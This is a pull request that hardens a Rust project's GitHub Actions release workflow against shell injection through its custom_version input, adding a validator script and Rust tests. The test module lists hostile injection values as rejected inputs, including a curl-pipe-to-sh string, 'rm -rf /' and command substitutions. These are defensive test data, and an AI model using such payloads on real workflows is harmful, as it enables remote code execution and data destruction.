### PR TITLE
release.yml interpolates custom_version into the shell before validating it

### DIFF
--- a/.github/scripts/validate-custom-version.sh
+++ b/.github/scripts/validate-custom-version.sh
@@ -1,0 +1,68 @@
+#!/usr/bin/env bash
+#
+# Judge `release.yml`'s `custom_version` input before anything uses it.
+#
+# The step that used to do this interpolated `${{ inputs.custom_version }}`
+# straight into its own `run:` body and then validated the result two lines
+# below. `${{ }}` is substituted while the step's script is being *generated*,
+# so by the time the check ran the value was already part of the script that
+# was running it — a value carrying a quote and a newline put its second line
+# outside the `if` and made the check unreachable. The value now reaches the
+# shell only as an environment binding, and this script is what judges it, in
+# a step of its own that runs first.
+#
+# The check is `[[ =~ ]]` rather than the `echo "$V" | grep -qE '^…$'` it
+# replaces, and that is not a style preference: `grep` judges one line at a
+# time, so `1.2.3` followed by a newline and anything at all matched on its
+# first line and passed. The accepted value is written as `version=$NEW_VERSION`
+# into `$GITHUB_OUTPUT`, where a second line sets further step outputs. Bash
+# anchors `[[ =~ ]]` to the whole string.
+#
+# The grammar is deliberately the same one the old check named. Widening it
+# here would desynchronise three things that are matched against the result:
+# this script, `.github/scripts/verify-release-version.sh`'s comment about the
+# `-beta.1` suffix, and `CHANGELOG.md`'s `## [x.y.z]` headings. If it ever
+# changes, all three move together.
+#
+# An empty argument is what every `version_type` dispatch sends — the release
+# comes from the bump type instead — so it is accepted, and says so.
+#
+# Usage: validate-custom-version.sh <version>
+# Exit:  0 usable · 1 not a version · 2 usage error
+#
+# The two failing codes are distinct on purpose: 1 says the human who
+# dispatched the release typed something wrong, 2 says this step was wired up
+# wrong. They are different fixes and the log should not conflate them.
+set -euo pipefail
+
+if [ "$#" -ne 1 ]; then
+  echo "usage: $0 <version>" >&2
+  echo "Pass the empty string when no custom version was named." >&2
+  exit 2
+fi
+
+VERSION="$1"
+
+if [ -z "$VERSION" ]; then
+  echo "No custom_version given; the release will be computed from version_type."
+  exit 0
+fi
+
+# Held in a variable, so the right-hand side of =~ must stay UNQUOTED — quoting
+# it matches the pattern as a literal string and nothing ever passes.
+SEMVER='^[0-9]+\.[0-9]+\.[0-9]+(-[a-zA-Z0-9.]+)?$'
+
+if [[ ! $VERSION =~ $SEMVER ]]; then
+  cat >&2 <<EOF
+Error: custom_version is not a version.
+
+  given: $(printf '%q' "$VERSION")
+
+Expected semver: 1.2.3, or 1.2.3-beta.1 with a pre-release suffix. No leading
+'v', no surrounding whitespace, exactly three numeric components. Nothing has
+been installed, written or tagged — re-dispatch with a corrected value.
+EOF
+  exit 1
+fi
+
+echo "custom_version is $VERSION."

--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -1,6 +1,22 @@
 # Release Workflow
 # Triggered manually via workflow_dispatch to create a new release
 # Bumps versions, creates tags, and triggers the deploy workflow
+#
+# Repository rule: no `${{ }}` inside a `run:` body, anywhere, ever.
+# `${{ }}` is substituted while the step's script is being *generated*, so an
+# interpolated value is part of the script rather than data the script reads —
+# a quote and a newline in a workflow_dispatch input end one command and start
+# another, and any validation written inside the same body runs too late to
+# matter. Bind the value under `env:` and read it as `"$NAME"`, and validate a
+# free-form input in a step of its own before anything uses it (see
+# `Validate custom_version` below). `src/release_input_validation.rs` holds
+# this file to that rule on every `cargo test --lib`.
+#
+# The rule is a repository rule, not a rule about this file — but only this
+# file satisfies it today. `.github/workflows/release-deploy.yml` still
+# interpolates into five `run:` bodies, including free-form `version` and `tag`
+# inputs that nothing validates, and is deliberately out of scope here and
+# untested; it is tracked separately. Do not copy its shape.
 
 name: Release
 
@@ -46,6 +62,19 @@ jobs:
           fetch-depth: 0
           token: ${{ secrets.GITHUB_TOKEN }}
 
+      # First thing after the checkout, which is what puts the script on disk,
+      # and so before `cargo install cargo-edit`: a typo in a dispatch is
+      # answered in seconds rather than after a toolchain install.
+      #
+      # No `if:` on purpose. The script accepts the empty value — that is what
+      # every version_type dispatch sends — and a line in the log saying which
+      # way this release is being computed reads better than a skipped step.
+      - name: Validate custom_version
+        env:
+          CUSTOM_VERSION: ${{ inputs.custom_version }}
+        run: |
+          .github/scripts/validate-custom-version.sh "$CUSTOM_VERSION"
+
       - name: Configure Git
         run: |
           git config user.name "github-actions[bot]"
@@ -66,24 +95,23 @@ jobs:
 
       - name: Calculate new version
         id: bump
+        env:
+          CURRENT: ${{ steps.current.outputs.version }}
+          CUSTOM_VERSION: ${{ inputs.custom_version }}
+          VERSION_TYPE: ${{ inputs.version_type }}
         run: |
-          CURRENT="${{ steps.current.outputs.version }}"
-
-          if [ -n "${{ inputs.custom_version }}" ]; then
-            # Use custom version if provided
-            NEW_VERSION="${{ inputs.custom_version }}"
-            # Validate semver format
-            if ! echo "$NEW_VERSION" | grep -qE '^[0-9]+\.[0-9]+\.[0-9]+(-[a-zA-Z0-9.]+)?$'; then
-              echo "Error: Invalid version format. Expected semver (e.g., 1.2.3 or 1.2.3-beta.1)"
-              exit 1
-            fi
+          if [ -n "$CUSTOM_VERSION" ]; then
+            # Already judged by the Validate custom_version step above, which
+            # is the only place that can judge it: a check written here would
+            # run inside a script the value had already been pasted into.
+            NEW_VERSION="$CUSTOM_VERSION"
           else
             # Calculate version based on bump type
             IFS='.' read -r MAJOR MINOR PATCH <<< "$CURRENT"
             # Strip any pre-release suffix from PATCH
             PATCH=$(echo "$PATCH" | sed 's/-.*//')
 
-            case "${{ inputs.version_type }}" in
+            case "$VERSION_TYPE" in
               major)
                 NEW_VERSION="$((MAJOR + 1)).0.0"
                 ;;
@@ -104,15 +132,17 @@ jobs:
       # check what would be released, so it has to report a wrong version
       # rather than stay silent about it.
       - name: Verify the version is the one being released
+        env:
+          NEW_VERSION: ${{ steps.bump.outputs.version }}
+          TAG: ${{ steps.bump.outputs.tag }}
         run: |
-          .github/scripts/verify-release-version.sh "${{ steps.bump.outputs.version }}"
+          .github/scripts/verify-release-version.sh "$NEW_VERSION"
 
           # Separable from the changelog check above, and self-contained: this
           # block can be deleted without touching anything else. A tag that
           # already exists means this version was released once already, and
           # `git tag -a` below would fail after Cargo.toml had been written.
           # `actions/checkout` runs with fetch-depth: 0, so the tags are here.
-          TAG="${{ steps.bump.outputs.tag }}"
           if git rev-parse -q --verify "refs/tags/$TAG" >/dev/null; then
             echo "Error: $TAG already exists. A published version cannot be reused," >&2
             echo "even after 'cargo yank' — pick the next one." >&2
@@ -121,14 +151,18 @@ jobs:
 
       - name: Update Cargo.toml version
         if: ${{ !inputs.dry_run }}
+        env:
+          NEW_VERSION: ${{ steps.bump.outputs.version }}
         run: |
-          cargo set-version ${{ steps.bump.outputs.version }}
-          echo "Updated Cargo.toml to version ${{ steps.bump.outputs.version }}"
+          cargo set-version "$NEW_VERSION"
+          echo "Updated Cargo.toml to version $NEW_VERSION"
 
       - name: Generate release notes
         id: release_notes
+        env:
+          TAG: ${{ steps.bump.outputs.tag }}
+          REPOSITORY: ${{ github.repository }}
         run: |
-          TAG="${{ steps.bump.outputs.tag }}"
           PREV_TAG=$(git describe --tags --abbrev=0 2>/dev/null || echo "")
 
           echo "Generating release notes..."
@@ -139,8 +173,8 @@ jobs:
             CHANGELOG_LINK="First release"
           else
             # Get commits since last tag
-            COMMITS=$(git log ${PREV_TAG}..HEAD --pretty=format:"- %s (%h)" --no-merges)
-            CHANGELOG_LINK="https://github.com/${{ github.repository }}/compare/${PREV_TAG}...${TAG}"
+            COMMITS=$(git log "${PREV_TAG}..HEAD" --pretty=format:"- %s (%h)" --no-merges)
+            CHANGELOG_LINK="https://github.com/${REPOSITORY}/compare/${PREV_TAG}...${TAG}"
           fi
 
           # Create release notes file
@@ -157,20 +191,26 @@ jobs:
 
       - name: Commit version bump
         if: ${{ !inputs.dry_run }}
+        env:
+          NEW_VERSION: ${{ steps.bump.outputs.version }}
         run: |
           git add Cargo.toml
           # Cargo.toml may already carry the target version — a release prepared
           # in a PR makes `cargo set-version` a no-op, and `git commit` with an
           # empty stage exits 1 and would abort the release before the tag.
           git diff --cached --quiet || \
-            git commit -m "chore: bump version to ${{ steps.bump.outputs.version }}"
+            git commit -m "chore: bump version to $NEW_VERSION"
 
       - name: Create and push tag
         if: ${{ !inputs.dry_run }}
+        env:
+          NEW_VERSION: ${{ steps.bump.outputs.version }}
+          TAG: ${{ steps.bump.outputs.tag }}
+          BRANCH: ${{ github.ref_name }}
         run: |
-          git tag -a "${{ steps.bump.outputs.tag }}" -m "Release ${{ steps.bump.outputs.version }}"
-          git push origin HEAD:${{ github.ref_name }}
-          git push origin "${{ steps.bump.outputs.tag }}"
+          git tag -a "$TAG" -m "Release $NEW_VERSION"
+          git push origin "HEAD:$BRANCH"
+          git push origin "$TAG"
 
       - name: Upload release notes artifact
         uses: actions/upload-artifact@v4
@@ -180,13 +220,18 @@ jobs:
           retention-days: 1
 
       - name: Summary
+        env:
+          PREVIOUS_VERSION: ${{ steps.current.outputs.version }}
+          NEW_VERSION: ${{ steps.bump.outputs.version }}
+          TAG: ${{ steps.bump.outputs.tag }}
+          DRY_RUN: ${{ inputs.dry_run }}
         run: |
           echo "## Release Summary" >> $GITHUB_STEP_SUMMARY
           echo "" >> $GITHUB_STEP_SUMMARY
-          echo "- **Previous Version**: ${{ steps.current.outputs.version }}" >> $GITHUB_STEP_SUMMARY
-          echo "- **New Version**: ${{ steps.bump.outputs.version }}" >> $GITHUB_STEP_SUMMARY
-          echo "- **Tag**: ${{ steps.bump.outputs.tag }}" >> $GITHUB_STEP_SUMMARY
-          echo "- **Dry Run**: ${{ inputs.dry_run }}" >> $GITHUB_STEP_SUMMARY
+          echo "- **Previous Version**: $PREVIOUS_VERSION" >> $GITHUB_STEP_SUMMARY
+          echo "- **New Version**: $NEW_VERSION" >> $GITHUB_STEP_SUMMARY
+          echo "- **Tag**: $TAG" >> $GITHUB_STEP_SUMMARY
+          echo "- **Dry Run**: $DRY_RUN" >> $GITHUB_STEP_SUMMARY
 
   deploy:
     name: Deploy Release

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -202,9 +202,44 @@ All notable changes to this project will be documented in this file.
   instead of staying silent, and it also refuses a tag that already exists.
   The supported flow is #170's: prepare the release in a pull request, then
   dispatch with `custom_version: x.y.z`
+- `.github/scripts/validate-custom-version.sh`, and a `Validate custom_version`
+  step in `release.yml` that runs it immediately after the checkout — before
+  `cargo install cargo-edit`, so a typo is answered in seconds rather than
+  after a toolchain install. `Calculate new version` used to interpolate
+  `${{ inputs.custom_version }}` straight into its own `run:` body and then
+  validate the result two lines below, which cannot work: `${{ }}` is
+  substituted while the step's script is being *generated*, so the value was
+  already part of the script by the time the check meant to judge it ran, and a
+  value carrying a quote and a newline put its second line outside the `if`
+  entirely. The grammar accepted is unchanged
+  (`1.2.3`, or `1.2.3-beta.1`) — `verify-release-version.sh` and `CHANGELOG.md`'s
+  `## [x.y.z]` headings are matched against the result, so widening it would
+  desynchronise them — but the check is now bash `[[ =~ ]]` rather than
+  `grep -qE`, because `grep` judges one line at a time and so passed anything
+  whose first line was a version. The empty value is accepted, since that is
+  what every `version_type` dispatch sends. No new inputs, and the step carries
+  no `if:`
+- `src/release_input_validation.rs`, nine tests holding `release.yml` to the
+  rule on every `cargo test --lib`: no `${{ }}` in any `run:` body, the
+  custom_version input only ever an `env:` binding, the validator ordered ahead
+  of every step that uses or writes the version, and the validator's own
+  answers — including that it reports a usage error (2) separately from a
+  rejected version (1). The `run:`-body parser is itself tested against a
+  fixture, so a parser that silently stopped matching cannot report success.
+  **The module covers `release.yml` only**: `release-deploy.yml`, which runs
+  `cargo publish` with `CARGO_REGISTRY_TOKEN` set for every job, has the same
+  defect in five `run:` blocks and is tracked separately
 
 ### Changed
 
+- Every `run:` block in `release.yml` takes its outside values from `env:`
+  bindings (`CURRENT`, `CUSTOM_VERSION`, `VERSION_TYPE`, `NEW_VERSION`, `TAG`,
+  `BRANCH`, `REPOSITORY`, `PREVIOUS_VERSION`, `DRY_RUN`) rather than `${{ }}`
+  interpolation, and a comment at the top of the file states the rule for the
+  next person adding an input. Behaviour is unchanged; the one incidental
+  repair is that `cargo set-version ${{ ... }}` was unquoted and is now
+  `cargo set-version "$NEW_VERSION"`. The rule is a repository rule, but
+  `release-deploy.yml` does not satisfy it yet
 - `Button`, `SidebarTrigger` and `Select`'s trigger take keyboard focus when
   they are enabled, and decline it — **with a stated reason** — when they are
   disabled. Tab now moves focus between gpuikit controls, and a disabled control

--- a/src/lib.rs
+++ b/src/lib.rs
@@ -83,6 +83,16 @@ pub use icons::Icons as DefaultIcons;
 #[cfg(test)]
 mod release_version_guard;
 
+/// Tests for the rule that keeps `release.yml`'s `workflow_dispatch` inputs out
+/// of its shell — no `${{ }}` inside a `run:` body, and free-form inputs judged
+/// in a step of their own before anything uses them.
+///
+/// No runtime code, and nothing outside a test build. Covers `release.yml`
+/// only; `release-deploy.yml` has the same defect and is tracked separately.
+/// See its own docs.
+#[cfg(test)]
+mod release_input_validation;
+
 /// Embedded assets for gpuikit (icons, fonts, etc.)
 #[derive(RustEmbed)]
 #[folder = "assets"]

--- a/src/release_input_validation.rs
+++ b/src/release_input_validation.rs
@@ -1,0 +1,379 @@
+//! Tests for the rule that keeps a `workflow_dispatch` input out of
+//! `.github/workflows/release.yml`'s shell: no `${{ }}` inside a `run:` body,
+//! and free-form inputs judged in a step of their own before anything uses
+//! them.
+//!
+//! `${{ }}` is substituted while a step's script is being *generated*, so an
+//! interpolated value is part of the script rather than data the script reads.
+//! `Calculate new version` used to paste `custom_version` in and then validate
+//! the result two lines below; a value carrying a quote and a newline put its
+//! second line outside the `if` and made that check unreachable. The value now
+//! arrives as an environment binding and is judged by
+//! `.github/scripts/validate-custom-version.sh` in a step that runs first.
+//!
+//! **Scope: `release.yml` only.** Everything asserted here is asserted about
+//! that one file. `.github/workflows/release-deploy.yml` — the workflow that
+//! actually runs `cargo publish`, with `CARGO_REGISTRY_TOKEN` set at workflow
+//! level for every job — has the same defect in five `run:` blocks, including
+//! free-form `version` and `tag` inputs that nothing validates anywhere. That
+//! is deliberately out of scope here: sweeping it, writing its validator and
+//! testing it is its own change — release-deploy.yml (tracked separately),
+//! whose issue number was not yet visible when this was written. So the
+//! absence of a failure from this module is not a statement that the
+//! repository is clean; it is a statement about `release.yml`. Do not read the
+//! module name as wider than this paragraph.
+//!
+//! They live in the lib rather than `tests/`, for the reason stated at
+//! `src/elements.rs`'s `triage_coverage`: `cargo test --lib` is the command
+//! that works in a constrained environment. The parser asserts it matched
+//! something before anything else is trusted, and there is a fixture it is run
+//! against, for the same reason `release_version_guard` does — a parser that
+//! silently found nothing reports success.
+
+use std::path::PathBuf;
+use std::process::Command;
+
+const RELEASE_YML: &str = include_str!("../.github/workflows/release.yml");
+
+/// The validator the workflow calls. Named once so a rename fails in one place.
+const SCRIPT: &str = ".github/scripts/validate-custom-version.sh";
+
+/// The number of `run:` bodies `release.yml` had when this was written. A floor
+/// rather than an equality: steps get added. It exists so that a parser which
+/// stopped recognising anything cannot pass the "no interpolation" test by
+/// finding nothing to check.
+const RUN_BODY_FLOOR: usize = 10;
+
+fn repo_root() -> PathBuf {
+    PathBuf::from(env!("CARGO_MANIFEST_DIR"))
+}
+
+/// One `run:` body, with the 1-based line its `run:` key sits on.
+#[derive(Debug)]
+struct RunBody {
+    line: usize,
+    text: String,
+}
+
+fn indent_of(line: &str) -> usize {
+    line.len() - line.trim_start().len()
+}
+
+/// Every `run:` body in a workflow, and nothing else.
+///
+/// Handles both shapes this repository uses: `run: <command>` on one line, and
+/// a `run: |` block scalar whose body is every following line indented past the
+/// `run:` key. Deliberately narrow — `env:` bindings, `with:` values, job
+/// outputs and the file's own comments all contain `${{` legitimately, and only
+/// a `run:` body is a shell script.
+fn run_bodies(yaml: &str) -> Vec<RunBody> {
+    let lines: Vec<&str> = yaml.lines().collect();
+    let mut bodies = Vec::new();
+    let mut i = 0;
+
+    while i < lines.len() {
+        let line = lines[i];
+        let trimmed = line.trim_start();
+        let Some(rest) = trimmed.strip_prefix("run:") else {
+            i += 1;
+            continue;
+        };
+        let key_indent = indent_of(line);
+        let rest = rest.trim();
+
+        // A block scalar: `|`, `|-`, `>`, and their chomping variants.
+        if rest.starts_with('|') || rest.starts_with('>') {
+            let mut text = String::new();
+            let mut j = i + 1;
+            while j < lines.len() {
+                let body_line = lines[j];
+                if !body_line.trim().is_empty() && indent_of(body_line) <= key_indent {
+                    break;
+                }
+                text.push_str(body_line);
+                text.push('\n');
+                j += 1;
+            }
+            bodies.push(RunBody { line: i + 1, text });
+            i = j;
+        } else {
+            bodies.push(RunBody {
+                line: i + 1,
+                text: rest.to_string(),
+            });
+            i += 1;
+        }
+    }
+
+    bodies
+}
+
+/// A workflow shaped like the ones here, carrying exactly one interpolated
+/// `run:` body, so that the detector is checked against a known answer rather
+/// than only against a file that is expected to be clean.
+const FIXTURE: &str = r#"# A comment mentioning ${{ inputs.thing }}, which is not a script.
+name: Fixture
+on:
+  workflow_dispatch:
+    inputs:
+      thing:
+        type: string
+jobs:
+  demo:
+    runs-on: ubuntu-latest
+    steps:
+      - name: Bound properly
+        env:
+          THING: ${{ inputs.thing }}
+        run: |
+          echo "$THING"
+      - name: Interpolated
+        run: |
+          echo "${{ inputs.thing }}"
+      - name: One-liner
+        run: echo clean
+      - name: Uses an action
+        uses: actions/checkout@v4
+        with:
+          ref: ${{ inputs.thing }}
+"#;
+
+#[test]
+fn the_run_body_parser_sees_an_interpolated_body_and_only_that() {
+    let bodies = run_bodies(FIXTURE);
+
+    assert_eq!(
+        bodies.len(),
+        3,
+        "the fixture has three `run:` bodies — two blocks and a one-liner — and the \
+         parser found {}: {bodies:#?}",
+        bodies.len()
+    );
+
+    let interpolated: Vec<usize> = bodies
+        .iter()
+        .filter(|b| b.text.contains("${{"))
+        .map(|b| b.line)
+        .collect();
+
+    assert_eq!(
+        interpolated.len(),
+        1,
+        "the fixture interpolates into exactly one `run:` body; the parser called it \
+         {interpolated:?}. Either it cannot see an interpolated body, or it mistook \
+         the comment, the `env:` binding or the `with:` value for one"
+    );
+
+    let clean = bodies
+        .iter()
+        .find(|b| b.text.contains("$THING"))
+        .expect("the parser lost the body that reads the env binding");
+    assert!(
+        !clean.text.contains("${{"),
+        "the `env:` binding above a body leaked into the body: {clean:#?}"
+    );
+
+    assert!(
+        bodies.iter().any(|b| b.text.trim() == "echo clean"),
+        "the `run: <command>` one-liner shape was not parsed: {bodies:#?}"
+    );
+}
+
+/// The rule itself. `${{ }}` inside a `run:` body is substituted before the
+/// shell sees it, so the value is code rather than data and nothing written
+/// inside that body can judge it in time.
+#[test]
+fn no_run_body_in_release_yml_interpolates_a_workflow_expression() {
+    let bodies = run_bodies(RELEASE_YML);
+
+    assert!(
+        bodies.len() >= RUN_BODY_FLOOR,
+        "the parser found only {} `run:` bodies in release.yml, below the floor of \
+         {RUN_BODY_FLOOR}. Either most steps were deleted or the parser stopped \
+         working — and a parser that finds nothing passes the check below for free",
+        bodies.len()
+    );
+
+    let offenders: Vec<String> = bodies
+        .iter()
+        .filter(|b| b.text.contains("${{"))
+        .map(|b| format!("line {}:\n{}", b.line, b.text))
+        .collect();
+
+    assert!(
+        offenders.is_empty(),
+        "release.yml interpolates a workflow expression into a `run:` body. Bind the \
+         value under `env:` and read it as \"$NAME\" instead — see the rule at the top \
+         of the file:\n\n{}",
+        offenders.join("\n")
+    );
+}
+
+/// The input this was reported about, specifically: it may appear as the
+/// right-hand side of an `env:` binding and nowhere else.
+#[test]
+fn custom_version_reaches_the_shell_only_as_an_env_binding() {
+    let mentions: Vec<(usize, &str)> = RELEASE_YML
+        .lines()
+        .enumerate()
+        .filter(|(_, line)| line.contains("inputs.custom_version"))
+        .map(|(i, line)| (i + 1, line.trim()))
+        .collect();
+
+    assert!(
+        !mentions.is_empty(),
+        "release.yml no longer reads the custom_version input at all, so this test is \
+         checking nothing"
+    );
+
+    for (line, text) in &mentions {
+        let bound = text.split_once(": ").is_some_and(|(name, value)| {
+            !name.is_empty()
+                && name.chars().all(|c| c.is_ascii_uppercase() || c == '_')
+                && value.trim() == "${{ inputs.custom_version }}"
+        });
+        assert!(
+            bound,
+            "line {line} uses the custom_version input somewhere other than an `env:` \
+             binding: {text}"
+        );
+    }
+}
+
+/// A validator that runs after the value has been used is not a validator. It
+/// has to precede the step that computes the version from it, and every step
+/// that writes something.
+#[test]
+fn the_validator_runs_before_anything_uses_the_version() {
+    let validator = RELEASE_YML
+        .find(SCRIPT)
+        .unwrap_or_else(|| panic!("release.yml no longer calls {SCRIPT}"));
+
+    for user in [
+        "- name: Calculate new version",
+        "cargo set-version",
+        "git tag -a",
+        "git push origin",
+    ] {
+        let at = RELEASE_YML.find(user).unwrap_or_else(|| {
+            panic!(
+                "release.yml no longer contains `{user}`. If the step was renamed, \
+                 update this list — otherwise this test passes by finding nothing"
+            )
+        });
+        assert!(
+            validator < at,
+            "`{user}` comes before the custom_version validator, so the value is used \
+             before it is judged"
+        );
+    }
+}
+
+/// The step exists, still binds the input, still hands it to the script, and is
+/// not skipped. The empty value is what every `version_type` dispatch sends and
+/// the script accepts it, so there is nothing for an `if:` to save.
+#[test]
+fn the_validation_step_binds_the_input_and_passes_it_on() {
+    let start = RELEASE_YML
+        .find("      - name: Validate custom_version")
+        .expect("the validation step was renamed; update this test with it");
+    let rest = &RELEASE_YML[start + 1..];
+    let end = rest
+        .find("\n      - name: ")
+        .expect("the validation step is never closed by another step");
+    let step = &rest[..end];
+
+    assert!(
+        step.contains("CUSTOM_VERSION: ${{ inputs.custom_version }}"),
+        "the validation step no longer binds the input, so it is judging something \
+         else:\n{step}"
+    );
+    assert!(
+        step.contains(SCRIPT) && step.contains("\"$CUSTOM_VERSION\""),
+        "the validation step no longer passes the bound value to {SCRIPT}:\n{step}"
+    );
+    assert!(
+        !step.contains("if:"),
+        "the validation step grew an `if:`, so some dispatch reaches the shell \
+         unjudged:\n{step}"
+    );
+}
+
+fn run_validator(argv: &[&str]) -> std::process::Output {
+    Command::new("bash")
+        .arg(repo_root().join(SCRIPT))
+        .args(argv)
+        .output()
+        .expect("bash is available to run the validator")
+}
+
+#[test]
+fn the_workflow_calls_a_validator_that_exists() {
+    assert!(
+        repo_root().join(SCRIPT).exists(),
+        "{SCRIPT} is gone, and release.yml calls it"
+    );
+    assert!(
+        RELEASE_YML.contains(SCRIPT),
+        "release.yml no longer calls {SCRIPT}, so nothing judges custom_version before \
+         the shell sees it"
+    );
+}
+
+/// The empty value is in this list on purpose: it is what a `version_type`
+/// dispatch sends, and a validator that rejected it would break the ordinary
+/// release path.
+#[test]
+fn the_validator_accepts_a_version_and_the_empty_value() {
+    for version in ["1.2.3", "0.8.0", "1.2.3-beta.1", "10.20.30-rc.2", ""] {
+        let out = run_validator(&[version]);
+        assert!(
+            out.status.success(),
+            "the validator rejected `{version}`, which is a value a real dispatch \
+             sends:\n{}",
+            String::from_utf8_lossy(&out.stderr)
+        );
+    }
+}
+
+/// The two-line cases are the reason the check is bash `[[ =~ ]]` rather than
+/// the `echo | grep -qE '^…$'` it replaces: `grep` judges one line at a time,
+/// so a value whose first line is a version passed however it continued.
+#[test]
+fn the_validator_rejects_everything_that_is_not_a_version() {
+    for version in [
+        "v1.2.3",
+        "1.2",
+        "1.2.3.4",
+        " 1.2.3",
+        "1.2.3 ",
+        "latest",
+        "1.2.3; id",
+        "$(id)",
+        "`id`",
+        "1.2.3\"; curl http://example.invalid/x | sh; \"",
+        "1.2.3\nrm -rf /",
+    ] {
+        let out = run_validator(&[version]);
+        assert_eq!(
+            out.status.code(),
+            Some(1),
+            "the validator answered {:?} for {version:?}; 1 is `not a version`",
+            out.status.code()
+        );
+    }
+}
+
+/// A wiring mistake and a mistyped version are different problems with
+/// different fixes, so they get different codes. Kept distinct deliberately.
+#[test]
+fn the_validator_reports_a_usage_error_separately() {
+    let out = run_validator(&[]);
+    assert_eq!(
+        out.status.code(),
+        Some(2),
+        "called with no argument the validator answered {:?}; 2 is `wired up wrong`, \
+         and must stay distinct from 1, `not a version`",
+        out.status.code()
+    );
+}


### PR DESCRIPTION
# Validate `custom_version` before it reaches the shell

`release.yml`'s `Calculate new version` step interpolated `${{ inputs.custom_version }}`
straight into its `run:` body and then tried to validate the result two lines below.
`${{ }}` is substituted while a step's script is being *generated*, so the value was
already part of the script by the time the `grep` meant to judge it ran; a value carrying
a quote and a newline put its second line outside the `if` and made that `grep`
unreachable. The input now reaches the shell only as an `env:` binding and is judged by
the new `.github/scripts/validate-custom-version.sh` in a `Validate custom_version` step
of its own, placed immediately after the checkout — before `cargo install cargo-edit`, so
a typo is answered in seconds rather than after a toolchain install. The script takes the
version as `$1` and answers `0` usable, `1` not a version, `2` wired up wrong; the empty
value is accepted, because that is what every `version_type` dispatch sends. The grammar
is deliberately unchanged (`1.2.3`, `1.2.3-beta.1`) since `verify-release-version.sh` and
`CHANGELOG.md`'s `## [x.y.z]` headings are matched against the result, but the check is
bash `[[ =~ ]]` rather than the `grep -qE` it replaces: `grep` judges one line at a time,
so `1.2.3` followed by a newline and anything at all passed on its first line — and the
accepted value is written into `$GITHUB_OUTPUT`, where a second line sets further step
outputs.

Every other `run:` block in `release.yml` was swept the same way, so the file now contains
no `${{ }}` inside a script body at all — outside values arrive as `CURRENT`,
`CUSTOM_VERSION`, `VERSION_TYPE`, `NEW_VERSION`, `TAG`, `BRANCH`, `REPOSITORY`,
`PREVIOUS_VERSION` and `DRY_RUN`. Behaviour is unchanged; one incidental repair is that
`cargo set-version ${{ … }}` was unquoted and is now `cargo set-version "$NEW_VERSION"`.
A comment at the top of the file states the rule, because the reason this is worth fixing
is that the shape gets copied the next time someone adds an input. `src/release_input_validation.rs`
(nine tests, wired as a `#[cfg(test)] mod` beside `release_version_guard`) holds the file
to that rule: a `run:`-body parser that is itself tested against a fixture, no `${{` in
any body with a floor on how many bodies were found, the custom_version input only ever
an `env:` binding, the validator ordered ahead of `Calculate new version`,
`cargo set-version`, `git tag -a` and `git push origin`, the step still binding and
passing on the value with no `if:`, and the script's own answers including the 1-vs-2
split. **Scope is `release.yml` only.** `.github/workflows/release-deploy.yml` — the
workflow that actually runs `cargo publish`, with `CARGO_REGISTRY_TOKEN` set at workflow
level for every job — has the same defect in five `run:` blocks, including free-form
`version` and `tag` inputs that nothing validates anywhere. It is deliberately untouched
and untested here; the exemption is stated in the module's doc comment and in the rule
comment at the top of `release.yml` so neither audience can mistake it for coverage.
Severity is unchanged from the issue's framing: dispatching a release already needs write
access, so this is a footgun in the one workflow that touches the crates.io token, not a
privilege escalation.

## Review feedback

- **Name the exemption in `src/release_input_validation.rs`'s doc comment (covers
  `release.yml` only; `release-deploy.yml` has the same defect, is deliberately out of
  scope, reference the tracking issue).** Done — a "**Scope: `release.yml` only.**"
  paragraph says so, names `release-deploy.yml`'s five `run:` blocks and its
  workflow-level `CARGO_REGISTRY_TOKEN`, and ends "the absence of a failure from this
  module is not a statement that the repository is clean". The issue number was not
  visible from here, so it reads `release-deploy.yml (tracked separately)` as instructed
  rather than inventing one. A shortened version of the same sentence is on the `mod`
  declaration in `src/lib.rs`, which is where a reader of the crate meets the module
  first.
- **Make the rule comment at the top of `release.yml` say it is a repository rule that
  `release-deploy.yml` does not yet satisfy.** Done — the comment states the rule, then a
  second paragraph: "The rule is a repository rule, not a rule about this file — but only
  this file satisfies it today", naming `release-deploy.yml`'s five `run:` bodies and its
  unvalidated free-form inputs, and ending "Do not copy its shape."
- **Do not widen the change to fix `release-deploy.yml`.** Done — it is byte-for-byte
  untouched, and no test asserts anything about it.
- **Preserve the bash `[[ =~ ]]` replacing `grep -qE`.** Kept, with the per-line-match
  defect written out in the script's header comment and exercised by the
  `1.2.3\nrm -rf /` case in `the_validator_rejects_everything_that_is_not_a_version` —
  that case fails under the old `grep`.
- **Preserve the 1-vs-2 exit-code split.** Kept and tested separately
  (`the_validator_reports_a_usage_error_separately`), with a comment in the script saying
  why they must stay distinct.

## Directions for this implementation

- **Start the cold `cargo test --lib` early so the compile overlaps the reading.** Done —
  it was launched in the background as the first action, before any file was read, and
  the script, workflow, test module and changelog were written while it ran.
- **Never run two cargo invocations at once.** Followed — only one cargo process existed
  at any moment; the verification run below was started only after the first had exited.
- **The exemption is documentation, not scope: do not fix `release-deploy.yml` and do not
  add tests for it.** Followed, as above.

Nothing in the review feedback or the directions conflicted with the spec, so there is
nothing to flag under that heading.

Verification: PENDING

Implements #179
